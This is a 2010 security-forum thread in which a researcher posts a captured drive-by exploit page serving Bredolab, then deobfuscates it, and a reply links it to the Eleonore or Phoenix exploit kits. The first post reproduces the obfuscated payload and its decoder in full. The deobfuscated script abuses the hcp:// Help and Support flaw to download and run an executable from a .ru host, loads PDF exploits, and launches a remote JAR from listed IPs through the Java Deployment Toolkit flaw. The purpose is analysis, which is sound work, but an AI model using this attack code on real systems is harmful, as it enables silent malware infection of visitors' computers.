Author Topic: *.ru:8080 Drive By's Serving Up Bredolab  (Read 5739 times)

0 Members and 1 Guest are viewing this topic.

August 13, 2010, 10:40:17 pm
Read 5739 times

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
I am seeing tons of drive bys on http://*.ru:8080 domains serving up bredolab as the payload. However I am not extremely familiar with all the different types of drive by kits, has anyone seen this type of kit before?

Code: [Select]
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Aug 2010 <REMOVED>
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: 0
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Set-Cookie: pid=1; expires=Fri, 13-Aug-2010 <REMOVED>

e95
<html>
<head><title>Xrgea3q5co5j0</title></head><body>

<div style="visibility: hidden;"><div name="Maz84dbeq" id="Maz84dbeq">102Q99Q37Q37Q97Q108Q96Q114Q106Q98Q107Q113Q43Q94Q105Q105Q38Q35Q35Q37Q107Q94Q115Q102Q100Q94Q113Q108Q111Q43Q94Q109Q109Q83Q98Q111Q112Q102Q108Q107Q43Q102Q107Q97Q98Q117Q76Q99Q37Q36Q74Q80Q70Q66Q29Q52Q43Q36Q38Q30Q58Q42Q46Q38Q38Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q116Q111Q102Q113Q98Q37Q31Q57Q102Q99Q111Q94Q106Q98Q29Q112Q111Q96Q58Q89Q31Q101Q96Q109Q55Q44Q44Q112Q98Q111Q115Q102Q96Q98Q112Q44Q112Q98Q94Q111Q96Q101Q60Q110Q114Q98Q111Q118Q58Q35Q113Q108Q109Q102Q96Q58Q101Q96Q109Q55Q44Q44Q112Q118Q112Q113Q98Q106Q44Q112Q118Q112Q102Q107Q99Q108Q44Q112Q118Q112Q102Q107Q99Q108Q106Q94Q102Q107Q43Q101Q113Q106Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q</div>
<div name="K69m8203" id="K69m8203">34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q43Q43Q34Q50Q64Q43Q43Q34Q50Q64Q112Q118Q112Q102Q107Q99Q108Q106Q94Q102Q107Q43Q101Q113Q106Q34Q114Q45Q45Q48Q99Q112Q115Q111Q58Q34Q48Q64Q112Q96Q111Q102Q109Q113Q40Q97Q98Q99Q98Q111Q34Q48Q66Q98Q115Q94Q105Q34Q47Q53Q114Q107Q98Q112Q96Q94Q109Q98Q34Q47Q53Q34Q47Q52Q107Q98Q116Q34Q47Q63Q62Q96Q113Q102Q115Q98Q85Q76Q95Q103Q98Q96Q113Q34Q47Q50Q47Q53Q34Q47Q50Q47Q47Q116Q112Q96Q111Q102Q109Q113Q43Q112Q101Q98Q105Q105Q34Q47Q50Q47Q47Q34Q47Q50Q47Q54Q43Q79Q114Q107Q34Q47Q50Q47Q53Q34Q47Q50Q47Q47Q96Q106Q97Q34Q47Q63Q34Q47Q50Q47Q67Q96Q34Q47Q63Q96Q97Q34Q47Q63Q43Q43Q34Q47Q50Q47Q67Q34Q47Q50Q47Q51Q98Q96Q101Q108Q34Q47Q63Q99</div>
<div name="Wq67wbxt8" id="Wq67wbxt8">Q114Q107Q96Q113Q102Q108Q107Q34Q47Q63Q94Q54Q34Q47Q50Q47Q53Q95Q51Q34Q47Q50Q47Q54Q34Q47Q50Q52Q63Q111Q83Q92Q92Q34Q47Q50Q48Q63Q99Q108Q111Q34Q47Q50Q47Q53Q102Q83Q95Q51Q43Q105Q98Q107Q100Q113Q101Q34Q47Q50Q48Q63Q102Q34Q47Q50Q48Q66Q83Q45Q34Q47Q50Q48Q63Q102Q42Q42Q34Q47Q50Q47Q54Q111Q34Q47Q50Q47Q63Q83Q95Q51Q43Q96Q101Q94Q111Q62Q113Q34Q47Q50Q47Q53Q102Q34Q47Q50Q47Q54Q34Q47Q50Q48Q63Q111Q98Q113Q114Q111Q107Q34Q47Q63Q111Q34Q47Q50Q52Q65Q107Q98Q116Q34Q47Q63Q67Q114Q107Q96Q113Q102Q108Q107Q34Q47Q50Q47Q53Q94Q54Q34Q47Q50Q47Q53Q92Q34Q47Q50Q48Q63Q34Q47Q50Q47Q54Q47Q34Q47Q50Q47Q64Q71Q98Q117Q98Q43Q113Q111Q94Q113Q112Q71Q34Q47Q50Q47Q53Q34Q47Q50Q50Q65Q71Q98Q105Q102Q71Q34Q47Q50Q410007Q63Q71Q67Q108Q81Q98Q115Q94Q80Q71Q34Q47Q50Q50Q63Q108Q34Q47Q50Q48Q63Q34Q47Q50Q47Q54Q34Q47Q50Q50Q65Q71Q118Q97Q108Q63Q98Q112Q107Q108Q71Q34Q47Q50Q47Q63Q71Q109Q112Q98Q111Q71Q34Q47Q50Q50Q63Q117Q34Q47Q50Q47Q53Q98Q113Q102Q111Q84Q43Q108Q34Q47Q50Q48Q63Q34Q47Q50Q47Q54Q34Q47Q50Q47Q53Q107Q98Q109Q76Q43Q108Q34Q47Q50Q48Q63Q46Q83Q98Q109Q118Q81Q43Q108Q34Q47Q50Q48Q63Q48Q83Q98Q97Q108Q74Q43Q108Q34Q47Q50Q48Q63Q34Q47Q50Q47Q54Q105Q105Q114Q107Q34Q47Q50Q47Q53Q97Q107Q98Q112Q43Q117Q34Q47Q50Q48Q63Q34Q47Q50Q47Q54Q45Q34Q47Q50Q47Q64Q71Q46Q83Q97Q102Q109Q34Q47Q50Q47Q51Q46Q83Q97Q102Q34Q47Q50Q48Q67Q109Q101Q109Q43Q98Q106Q108Q96Q105Q98Q116Q34Q47Q50Q47Q67Q45Q53Q45Q53Q34Q47Q50Q48Q62Q114Q111Q43Q98Q118Q97Q104Q107Q114Q109Q34Q47Q50Q47Q67Q34Q47Q50Q47Q67Q34Q47Q50Q48Q62Q109Q113Q113Q101Q71Q34Q47Q50Q47Q64Q71Q81Q66Q68Q71Q3</div>
<div name="Kpe0uous6" id="Kpe0uous6">4Q47Q50Q47Q53Q107Q98Q109Q108Q43Q117Q34Q47Q50Q48Q63Q34Q47Q50Q47Q54Q71Q77Q81Q81Q69Q73Q71Q34Q47Q50Q47Q63Q71Q74Q85Q43Q113Q99Q108Q112Q108Q111Q96Q102Q74Q71Q34Q47Q50Q47Q53Q94Q34Q47Q63Q116Q98Q107Q83Q117Q34Q47Q50Q48Q63Q34Q47Q50Q47Q54Q118Q34Q47Q50Q47Q53Q94Q34Q47Q63Q116Q98Q107Q83Q108Q34Q47Q50Q48Q63Q71Q106Q94Q98Q111Q113Q80Q43Q63Q65Q76Q65Q62Q71Q83Q118Q34Q47Q50Q48Q63Q34Q47Q50Q50Q65Q71Q113Q96Q98Q71Q34Q47Q50Q47Q63Q71Q103Q95Q76Q85Q98Q115Q102Q71Q34Q47Q50Q47Q63Q71Q113Q96Q62Q71Q34Q47Q50Q50Q63Q112Q102Q101Q113Q34Q47Q63Q83Q34Q47Q63Q94Q92Q34Q47Q50Q47Q54Q34Q47Q50Q47Q54Q34Q47Q50Q47Q53Q34Q47Q50Q47Q54Q34Q47Q50Q48Q63Q34Q47Q50Q48Q66Q43Q103Q112Q34Q47Q50Q47Q51Q96Q112Q96Q111Q102Q109Q113Q34Q47Q63Q43Q103Q112Q34Q47Q50Q47Q51Q97Q98Q105Q34Q47Q63Q34Q47Q50Q47Q67Q110Q34Q47Q63Q43Q103Q112Q34Q47Q50Q47Q51Q112Q113Q94Q111Q113Q43Q98Q117Q98Q34Q47Q50Q52Q64Q113Q94Q112Q104Q104Q102Q105Q105Q34Q47Q63Q34Q47Q50Q47Q67Q67Q34Q47Q63Q34Q47Q50Q47Q67Q70Q74Q34Q47Q63Q101Q98Q105Q109Q34Q47Q50Q47Q62Q34Q47Q50Q47Q47Q43Q111Q98Q109Q105Q94Q96Q98Q34Q47Q50Q47Q53Q34Q47Q50Q47Q67Q71Q34Q47Q50Q47Q67Q100Q34Q47Q50Q47Q64Q80Q113Q111Q102Q107Q100Q43Q99Q111Q108Q106Q64Q101Q94Q111Q64Q108Q97Q98Q34Q47Q50Q47Q53Q48Q49Q34Q47Q50Q47Q54Q34Q47Q50Q47Q54Q43Q111Q98Q109Q105Q94Q96Q98Q34Q47Q50Q47Q53Q34Q47Q50Q47Q67Q83Q34Q47Q50Q47Q67Q100Q34Q47Q50Q47Q64Q80Q113Q111Q102Q107Q100Q43Q99Q111Q108Q106Q64Q101Q94Q111Q64Q108Q97Q98Q34Q47Q50Q47Q53Q51Q46Q34Q47Q50Q47Q54Q34Q47Q50Q47Q54Q43Q111Q98Q109Q105Q94Q96Q98Q34Q47Q50Q47Q53Q34Q47Q5</div>
<div name="Yj0jepw" id="Yj0jepw">0Q47Q67Q92Q34Q47Q50Q47Q67Q100Q34Q47Q50Q47Q64Q80Q113Q111Q102Q107Q100Q43Q99Q111Q108Q106Q64Q101Q94Q111Q64Q108Q97Q98Q34Q47Q50Q47Q53Q48Q54Q34Q47Q50Q47Q54Q34Q47Q50Q47Q54Q34Q47Q50Q47Q64Q45Q34Q47Q50Q47Q64Q46Q34Q47Q50Q47Q54Q34Q47Q52Q34Q47Q54Q34Q47Q54Q34Q48Q64Q34Q47Q67Q112Q96Q111Q102Q109Q113Q34Q48Q66Q89Q31Q59Q57Q44Q102Q99Q111Q94Q106Q98Q59Q31Q38Q56Q7Q29Q29Q29Q29Q65Q51Q95Q102Q119Q52Q50Q45Q29Q58Q29Q107Q98Q116Q29Q62Q111Q111Q94Q118Q37Q31Q62Q96Q111Q108Q77Q65Q67Q43Q77Q65Q67Q31Q41Q29Q31Q77Q65Q67Q43Q77Q97Q99Q64Q113Q111Q105Q31Q38Q56Q7Q29Q29Q29Q29Q99Q108Q111Q37Q102Q29Q102Q107Q29Q65Q51Q95Q102Q119Q52Q50Q45Q38Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q113Q111Q118Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q78Q96Q97Q100Q96Q102Q102Q29Q58Q29Q107Q98Q116Q29Q62Q96Q113Q102Q115Q98Q85Q76Q95Q103Q98Q96Q113Q37Q65Q51Q95Q102Q119Q52Q50Q45Q88Q102Q90Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q102Q99Q29Q37Q78Q96Q97Q100Q96Q102Q102Q38Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q85Q107Q50Q46Q110Q46Q29Q58Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q96Q111Q98Q94Q113Q98Q66Q105Q98Q106Q98Q107Q113Q37Q31Q102Q99Q111Q94Q106Q98Q31Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q85Q107Q50Q46Q110Q46Q43Q112Q98Q113Q62Q113Q113Q111Q102Q95Q114Q113Q98Q37Q31Q112Q111Q96Q31Q41Q29Q31Q75Q108Q113Q98Q112Q46Q43Q109Q97Q99Q31Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q95Q108Q97Q118Q43Q94Q109Q109Q98Q107Q97Q64Q101Q102Q105Q97Q37Q85Q107Q50Q46Q110Q46Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q122Q7Q2</div>
<div name="Myiyhsd" id="Myiyhsd">9Q29Q29Q29Q29Q29Q29Q29Q122Q96Q94Q113Q96Q101Q37Q98Q38Q120Q122Q7Q29Q29Q29Q29Q122Q7Q29Q29Q29Q29Q7Q29Q29Q29Q29Q113Q111Q118Q120Q7Q29Q29Q29Q29Q102Q99Q29Q37Q107Q94Q115Q102Q100Q94Q113Q108Q111Q43Q103Q94Q115Q94Q66Q107Q94Q95Q105Q98Q97Q37Q38Q38Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q66Q99Q98Q53Q46Q101Q113Q95Q29Q58Q29Q97Q108Q96Q114Q106Q98147cQ107Q113Q43Q96Q111Q98Q94Q113Q98Q66Q105Q98Q106Q98Q107Q113Q37Q31Q102Q99Q111Q94Q106Q98Q31Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q66Q99Q98Q53Q46Q101Q113Q95Q43Q112Q98Q113Q62Q113Q113Q111Q102Q95Q114Q113Q98Q37Q31Q112Q111Q96Q31Q41Q29Q31Q62Q109Q109Q105Q98Q113Q46Q43Q101Q113Q106Q105Q31Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q95Q108Q97Q118Q43Q94Q109Q109Q98Q107Q97Q64Q101Q102Q105Q97Q37Q66Q99Q98Q53Q46Q101Q113Q95Q38Q56Q7Q29Q29Q29Q29Q29Q122Q7Q29Q29Q29Q29Q29Q122Q96Q94Q113Q96Q101Q37Q98Q38Q120Q122Q7Q29Q29Q29Q29Q7Q29Q29Q29Q29Q113Q111Q118Q120Q7Q29Q29Q29Q29Q102Q99Q29Q37Q107Q94Q115Q102Q100Q94Q113Q108Q111Q43Q103Q94Q115Q94Q66Q107Q94Q95Q105Q98Q97Q37Q38Q38Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q7Q29Q29Q29Q29Q29Q29Q29Q29Q115Q94Q111Q29Q102Q109Q112Q29Q58Q29Q88Q31Q46Q52Q49Q43Q46Q49Q48Q43Q46Q49Q50Q43Q47Q48Q49Q31Q41Q29Q31Q46Q53Q49Q43Q53Q47Q43Q48Q53Q43Q51Q53Q31Q41Q29Q31Q46Q54Q53Q43Q46Q49Q50Q43Q46Q46Q51Q43Q52Q46Q31Q41Q29Q31Q47Q45Q52Q43Q46Q54Q46Q43Q47Q47Q54Q43Q46Q51Q51Q31Q41Q29Q31Q47Q45Q52Q43Q50Q53Q43Q46Q53Q54Q43Q46Q48Q48Q31Q41Q29Q31Q47Q46Q47Q43Q46Q52Q50Q43Q49Q50Q43Q47Q49Q50Q31Q41Q29Q31Q51Q53Q43Q47Q48Q48Q43Q49Q43Q47Q52Q31Q90Q56Q7</div>
<div name="Rn9yw5z" id="Rn9yw5z">Q29Q29Q29Q29Q29Q29Q29Q29Q115Q94Q111Q29Q102Q109Q29Q58Q29Q102Q109Q112Q88Q74Q94Q113Q101Q43Q111Q108Q114Q107Q97Q37Q74Q94Q113Q101Q43Q111Q94Q107Q97Q108Q106Q37Q38Q29Q39Q29Q37Q102Q109Q112Q43Q105Q98Q107Q100Q113Q101Q42Q46Q38Q29Q38Q90Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q7Q29Q29Q29Q29Q29Q29Q29Q29Q115Q94Q111Q29Q114Q29Q58Q29Q31Q101Q113Q113Q109Q55Q29Q42Q71Q42Q103Q94Q111Q29Q42Q71Q89Q89Q89Q89Q31Q40Q102Q109Q40Q31Q89Q89Q109Q114Q95Q105Q102Q96Q89Q89Q45Q45Q46Q43Q103Q94Q111Q29Q107Q108Q107Q98Q31Q56Q7Q7Q29Q29Q29Q29Q29Q29Q29Q29Q102Q99Q29Q37Q116Q102Q107Q97Q108Q116Q43Q107Q94Q115Q102Q100Q94Q113Q108Q111Q43Q94Q109Q109Q75Q94Q106Q98Q29Q58Q58Q29Q31Q74Q102Q96Q111Q108Q112Q108Q99Q113Q29Q70Q107Q113Q98Q111Q107Q98Q113Q29Q66Q117Q109Q105Q108Q111Q98Q111Q31Q38Q29Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q115Q94Q111Q29Q108Q29Q58Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q96Q111Q98Q94Q113Q98Q66Q105Q98Q106Q98Q107Q113Q37Q31Q76Q63Q71Q66Q64Q81Q31Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q108Q43Q96Q105Q94Q112Q112Q102Q97Q29Q58Q29Q31Q96Q105Q112Q102Q97Q55Q64Q62Q67Q66Q66Q67Q62Q64Q42Q65Q66Q64Q52Q42Q45Q45Q45Q45Q42Q45Q45Q45Q45Q42Q62Q63Q64Q65Q66Q67Q67Q66Q65Q64Q63Q62Q31Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q108Q43Q105Q94Q114Q107Q96Q101Q37Q114Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q122Q29Q98Q105Q112Q98Q29Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q115Q94Q111Q29Q108Q29Q58Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q96Q111Q98Q94Q113Q98Q66Q105Q98Q106Q98Q107Q113Q37Q31Q76Q63Q71Q66Q64Q81Q31Q38Q56Q7Q29Q29Q</div>
<div name="L5je7fp0v" id="L5je7fp0v">29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q115Q94Q111Q29Q107Q29Q58Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q96Q111Q98Q94Q113Q98Q66Q105Q98Q106Q98Q107Q113Q37Q31Q76Q63Q71Q66Q64Q81Q31Q38Q56Q7Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q108Q43Q113Q118Q109Q98Q29Q58Q29Q31Q94Q109Q109Q105Q102Q96Q94Q113Q102Q108Q107Q44Q107Q109Q111Q114Q107Q113Q102Q106Q98Q42Q112Q96Q111Q102Q109Q113Q94Q95Q105Q98Q42Q109Q105Q114Q100Q102Q107Q56Q97Q98Q109Q105Q108Q118Q106Q98Q107Q113Q113Q108Q108Q105Q104Q102Q113Q31Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q107Q43Q113Q118Q109Q98Q29Q58Q29Q31Q94Q109Q109Q105Q102Q96Q94Q113Q102Q108Q107Q44Q103Q94Q115Q94Q42Q97Q98Q109Q105Q108Q118Q106Q98Q107Q113Q42Q113Q108Q108Q105Q104Q102Q113Q31Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q95Q108Q97Q118Q43Q94Q109Q109Q98Q107Q97Q64Q101Q102Q105Q97Q37Q108Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q95Q108Q97Q118Q43Q94Q109Q109Q98Q107Q97Q64Q101Q102Q105Q97Q37Q107Q38Q56Q7Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q113Q111Q118Q29Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q108Q43Q105Q94Q114Q107Q96Q101Q37Q114Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q122Q29Q96Q94Q113Q96Q101Q29Q37Q98Q38Q29Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q107Q43Q105Q94Q114Q107Q96Q101Q37Q114Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q122Q7Q29Q29Q29Q29Q29Q29Q29Q29Q122Q7Q29Q29Q29Q29Q122Q7Q29Q29Q29Q29Q122Q96Q94Q113Q96Q101Q37Q98Q38Q120Q122Q7Q29Q29Q29Q7Q29Q29Q29Q29</div>
</div><input type="checkbox" id="Hn6bgn" value="ent" checked="checked"><div></div>
<script type="text/javascript" language="javascript" src="jquery.jxx?v=5.3.4"></script>
<script>

/*
setTimeout("window.replace", "1000");
*/
function Vrkhh92v(Hz7aw3e5){
Sip00o6a =  document;
Xkwimls51 = Sip00o6a.getElementById(Hz7aw3e5);
return Xkwimls51.innerHTML;
}
var G5y6hww = "";

var D7a95toi = ["Maz84dbeq", "K69m8203", "Wq67wbxt8", "Kpe0uous6", "Yj0jepw", "Myiyhsd", "Rn9yw5z", "L5je7fp0v"]


var G5y6hww = "";
for (Xeo365t in D7a95toi){
G5y6hww += Vrkhh92v(D7a95toi[Xeo365t]);
}
U6blttq5y = "document";

U6blttq5y = eval(U6blttq5y);
if ( typeof(Mo9g0b0) == 'u(n.d.e%f.isn#e(d('.replace(/[\(\.%s#]/g, '')) Mo9g0b0 = "Pzjiudfwlw";
function D0irg1(Bufe23){U6blttq5y.write(Bufe23);}
function O7b076s(G5y6hww) {
Dw5jypjgw = G5y6hww.split(Mo9g0b0);
var Baout4e = "";
for (var Hz7aw3e5=0;Hz7aw3e5<Dw5jypjgw.length-1;Hz7aw3e5++) {
Id3pgs = parseInt(Dw5jypjgw[Hz7aw3e5]);
Id3pgs += 3;
Baout4e += String.fromCharCode(Id3pgs);
}
return(Baout4e);
}

D0irg1('<script language="javascript">'+O7b076s(G5y6hww)+'<[/[s[chr(i7p7t[>h'.replace(/[h7k\[\(]/g, ''));

</script>
</body>
</html>
0

***EDIT***
Also the request to the jquery.jxx file on the same box yeilds the following which is necessary to deobfuscate the JavaScript:

Code: [Select]
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Aug 2010 <REMOVED>
Content-Type: text/javascript
Connection: close
Expires: 0
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Length: 22

eval("Mo9g0b0='Q';");


Manually deobfuscated:

Code: [Select]
if((document.all)&&(navigator.appVersion.indexOf('MSIE 7.')!=-1)) document.write("<iframe src=\"hcp://services/search?query=&topic=hcp://system/sysinfo /sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A %%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript+defer%3Eeval%28unescape %28 %27new%2BActiveXObject%2528%2522wscript.shell%2522%2529.Run%2528%2522cmd %2B %252Fc%2Bcd%2B..%252F%2526echo%2Bfunction%2Ba9%2528b6%2529%257BrV__%253Bfor%2528iVb6.length%253Bi%253EV0%253Bi--%2529r%252BVb6.charAt%2528i%2529%253Breturn%2Br%257Dnew%2BFunction%2528a9%2528_%253B%25292%252CJexe.tratsJ%2528%255DJeliJ%25 䆚BJFoTevaSJ%255Bo%253B%2529%255DJydoBesnoJ%252BJpserJ%255Bx%2528etirW.o%253B%2529%2528nepO.o%253B1VepyT.o%253B3VedoM.o%253B%2529llun%2528dnes.x%253B%25290%252CJ1Vdip%25261Vdi%253Fphp.emoclew%252F0808%253Aur.eydknup%252F%252F%253AptthJ%252CJTEGJ%2528nepo.x%253B%2529JPTTHLJ%252BJMX.tfosorciMJ%2528a%2BwenVx%253B%2529y%2528a%2BwenVo%253BJmaertS.BDODAJVy%253B%255DJtceJ%252BJjbOXeviJ%252BJtcAJ%255Bsiht%2BV%2Ba_%2529%2529%2528%2529%253B%253E.js%2526cscript%2B.js%2526del%2B%252Fq%2B.js%2526start.exe%257Ctaskkill%2B%252FF%2B%252FIM%2Bhelp%252A%2522.replace%2528%252FJ%252Fg%252CString.fromCharCode%252834%2529%2529.replace%2528%252FV%252Fg%252CString.fromCharCode%252861%2529%2529.replace%2528%252F_%252Fg%252CString.fromCharCode%252839%2529%2529%252C0%252C1%2529%27%29%29%3C%2Fscript%3E\"></iframe>");
 D6biz750 = new Array("AcroPDF.PDF", "PDF.PdfCtrl");
 for(i in D6biz750){
 try{
 Qcdgcii = new ActiveXObject(D6biz750[i]);
 if (Qcdgcii){
 Xn51q1 = document.createElement("iframe");
 Xn51q1.setAttribute("src", "Notes1.pdf");
 document.body.appendChild(Xn51q1);
 }
 }catch(e){}
 }

 try{
 if (navigator.javaEnabled()){
 Efe81htb = docum罦nt.createElement("iframe");
 Efe81htb.setAttribute("src", "Applet1.html");
 document.body.appendChild(Efe81htb);
 }
 }catch(e){}

 try{
 if (navigator.javaEnabled()){

 var ips = ["174.143.145.234", "184.82.38.68", "198.145.116.71", "207.191.229.166", "207.58.189.133", "212.175.45.245", "68.233.4.27"];
 var ip = ips[Math.round(Math.random() * (ips.length-1) )];

 var u = "http: -J-jar -J\\\\"+ip+"\\public\\001.jar none";

 if (window.navigator.appName == "Microsoft Internet Explorer") {
 var o = document.createElement("OBJECT");
 o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
 o.launch(u);
 } else {
 var o = document.createElement("OBJECT");
 var n = document.createElement("OBJECT");

 o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
 n.type = "application/java-deployment-toolkit";
 document.body.appendChild(o);
 document.body.appendChild(n);

 try {
 o.launch(u);
 } catch (e) {
 n.launch(u);
 }
 }
 }
 }catch(e){}

 

August 14, 2010, 03:41:50 am
Reply #1

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
I believe both Eleonore and Phoenix are using these.

Exploits mix the Help & Support exploit with;

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0886

Exploits work in IE, Chrome and Firefox (not sure about Opera). FireEye did a piece on these a few months ago (though obviously these are much newer versions);

http://blog.fireeye.com/research/2010/04/who-is-exploiting-the-java-0day.html
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

August 14, 2010, 06:17:43 am
Reply #2

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
Cool, but the script and filenames seem different than what I have seen with my limited exposure to other drive by kits?

